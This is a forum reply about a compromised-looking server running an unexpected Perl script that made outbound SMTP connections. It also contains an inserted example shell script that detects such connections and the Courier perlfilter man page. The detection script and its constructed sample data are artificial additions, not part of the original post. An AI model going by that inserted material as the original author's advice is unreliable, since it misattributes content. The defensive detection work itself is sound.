Full Discussion: Malicious perl script
Post 302992395 by drysdalk on Friday 24th of February 2017 11:33:08 AM
Hi,

I suspect these are two different issues. So far you have seen evidence of attempted brute-forcing of your WordPress logins, and you also saw a Perl script establishing a variety of outbound SMTP connections back at the very start of this thread.

It is entirely possible that the two are related, but equally they may not be. There's always a steady trickle of would-be brute-forcing and exploit scanning in the logs of pretty much every Web server on the Internet, more or less. If your WordPress installation is genuinely secure, these should be nothing to worry about. More sinister is the Perl script.

If in the output of ps and top right now you're not able to see any errant Perl scripts, and if there is nothing Perl-related in any of your Web logs, then there's not much more you can do at this point to track down that Perl script.

What you can say for sure is that your server was clearly running an unexpected Perl script that appeared to be establishing a variety of outbound SMTP connections, and it must have come from somewhere. And if that somewhere wasn't you, then you do definitely have a security issue you still need to get to the bottom of.
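
The symptom described in this post, a Perl script holding outbound SMTP connections, can be looked for per connection as well as per process. The script below is an added example, not part of the original post: it filters `ss -tnp` output for SMTP peers owned by anything other than the expected mail software. The function names, the `EXPECTED_MTA` list and the sample lines (documentation addresses, made-up PIDs) are assumptions.

```sh
#!/bin/sh
# Added example: find processes that hold outbound SMTP connections.
# Feed it the output of `ss -tnp` (run as root so the process column is set).

# Mail software this host is expected to run (assumption: adjust per host).
EXPECTED_MTA="master smtp exim4 sendmail"

# Print "pid name peer" for every connection to port 25/465/587 whose owner
# is not in EXPECTED_MTA. "?" means ss could not show the owning process.
smtp_talkers() {
    awk -v allow="$EXPECTED_MTA" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 == "ESTAB" || $1 == "SYN-SENT" {
        k = split($5, p, ":"); port = p[k]          # works for [v6]:port too
        if (port != "25" && port != "465" && port != "587") next
        proc = ""; for (i = 6; i <= NF; i++) proc = proc " " $i
        name = "?"; pid = "?"
        s = index(proc, "((\"")                     # users:(("name",pid=N,...
        if (s) {
            rest = substr(proc, s + 3)
            name = substr(rest, 1, index(rest, "\"") - 1)
            q = index(rest, "pid=")
            if (q) { pid = substr(rest, q + 4); sub(/[^0-9].*/, "", pid) }
        }
        if (!(name in ok)) print pid, name, $5
    }'
}

# The binary the kernel is really executing for a PID, regardless of the
# name shown by ps or top (a script can change its displayed name).
real_exe() {
    readlink "/proc/$1/exe" 2>/dev/null || echo "unreadable"
}

# Constructed sample (documentation addresses, made-up PIDs).
SAMPLE='ESTAB 0 0 192.0.2.10:48712 203.0.113.25:25 users:(("perl",pid=4312,fd=5))
ESTAB 0 0 192.0.2.10:48713 198.51.100.7:25 users:(("httpd",pid=4313,fd=6))
ESTAB 0 0 192.0.2.10:40022 198.51.100.9:25 users:(("smtp",pid=901,fd=12))
ESTAB 0 0 192.0.2.10:22 198.51.100.50:51515 users:(("sshd",pid=777,fd=3))'

printf '%s\n' "$SAMPLE" | smtp_talkers
# Live use: ss -tnp | smtp_talkers, then real_exe <pid> for each hit.
```

On the sample this reports PIDs 4312 and 4313; on a live host, `real_exe` on a reported PID shows whether a process that calls itself something else is really the Perl interpreter.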
 

COURIERPERLFILTER(8)            Double Precision, Inc.            COURIERPERLFILTER(8)

NAME
       courierperlfilter - Sample Perl-based mail filter

SYNOPSIS
       filterctl [[start] | [stop]] [perlfilter]

DESCRIPTION
       This is an example global mail filter that uses an embedded Perl script. "Embedded" means that the Perl interpreter is loaded once, and the same Perl code is repeatedly called to accept or reject incoming messages, one by one. Perl filtering is relatively time consuming (compared to filtering in C or C++), and excessive delays in mail filters result in incoming mail being deferred (rejected with a temporary error code). Therefore the perlfilter wrapper can create multiple perlfilter processes, so that multiple processes are used to filter incoming mail.

       perlfilter requires Perl 5.004 or higher.

       The best way to create a Perl filter is to start with the sample filter, /usr/lib/courier/perlfilter-example.pl. This filter rejects messages that contain an excessively long Date: header (designed to crash certain poorly-written mail clients). Use it as a basis for writing your own filter. You can install your filter in any convenient location, then initialize the /etc/courier/filters/perlfilter configuration file, as described below. Run filterctl start perlfilter to activate filtering (if necessary, run courierfilter start to start the mail filtering subsystem).

   Setting up a Perl script
       Most of the ugly details of connecting the Perl script to Courier's mail filtering engine are taken care of by the sample perlfilter-example.pl script. One big no-no: the script MAY NOT change the current directory. Anything else goes, for the most part. Loading other modules and classes, pretty much anything else you can do with Perl, is allowed.

       The Perl script, just like any other mail filtering module, receives a pointer to a data file and one or more control files, each time a message is submitted to Courier for delivery. The sample script calls the filterdata() function to process the data file. The data file contains the actual message. The filtercontrol() function is called to process each control file. The control file contains recipient and message metadata. There may be more than one control file for each message.

       The example script includes an implementation of filterdata() that blocks messages with corrupted headers. The example script doesn't do anything interesting with filtercontrol().

       filterdata() and filtercontrol() must return an empty string if no serious objections are raised for this message. Any other return string is interpreted as an SMTP-style error code that is used to reject the message. Care must be taken that any error messages are formatted strictly according to the format of SMTP error messages (even though the message may not actually come in via SMTP).

CREDITS
       A lot of the Perl glue code is based on examples from the perlembed manual page, and other sources.

FILES
       perlfilter uses the following configuration files. Changes to the following files do not take effect until the filter has been stopped and restarted.

       /etc/courier/filters/perlfilter-mode
              If this file exists and contains the word "all", perlfilter will create its socket in /var/lib/courier/allfilters, otherwise the socket will be created in /var/lib/courier/filters, see courierfilter(8)[1] for more information.

       /etc/courier/filters/perlfilter-numprocs
              This file contains a number that sets how many perlfilter processes are created. The default is 5 processes. There's always an extra perlfilter process that's used to clean up crashed child processes.

       /etc/courier/filters/perlfilter
              This file MUST exist and it must contain a single line of text with the filename of the Perl script to load.

       /usr/lib/courier/perlfilter-example.pl
              This is a sample Perl script of the kind that /etc/courier/filters/perlfilter points to. Use it as an example of writing your own Perl filters.

       Please exercise good judgment in writing Perl-based filters. They should be reasonably fast, and should not allocate megabytes of memory. They should not be very promiscuous in creating global Perl variables, and should clean up after themselves. The current Perl wrapper does not destroy the Perl symbol table after each call to the filter script. However, do not take that for granted. This may change in the future.

SEE ALSO
       courierfilter(8)[1].

AUTHOR
       Sam Varshavchik
              Author

NOTES
       1. courierfilter(8)
          [set $man.base.url.for.relative.links]/courierfilter.html

Courier Mail Server                      04/04/2011                      COURIERPERLFILTER(8)